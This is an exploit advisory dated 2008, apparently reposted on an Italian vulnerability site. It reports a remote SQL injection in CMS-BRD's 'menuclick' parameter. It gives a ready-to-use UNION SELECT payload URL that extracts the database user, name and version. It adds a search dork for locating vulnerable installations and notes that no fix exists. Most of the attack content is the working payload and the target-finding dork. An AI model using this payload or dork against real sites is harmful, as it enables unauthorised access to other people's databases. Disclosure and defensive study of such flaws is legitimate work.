CMS-BRD (menuclick) Remote SQL Injection Vulnerability

2008-06-19 00:00:00

:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM

[ Discovered by dun \ dun[at]strcpy.pl ]

##########################################################
# [ CMS-BRD ] Remote SQL Injection Vulnerability #
##########################################################
#
# Script site: http://www.cms.brdconcept.fr/
#
# Vuln:
# http://site.com/index.php?lang=en&menuclick=-1+UNION+SELECT+concat_ws(char(58),USER(),DATABASE(),VERSION())/*
#
#
# Dork example: "Powered By CMS-BRD"
#
###############################################
# Greetz: D3m0n_DE * sid.psycho * str0ke and otherz..
###############################################

[ dun / 2008 ]

*******************************************************************************************

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.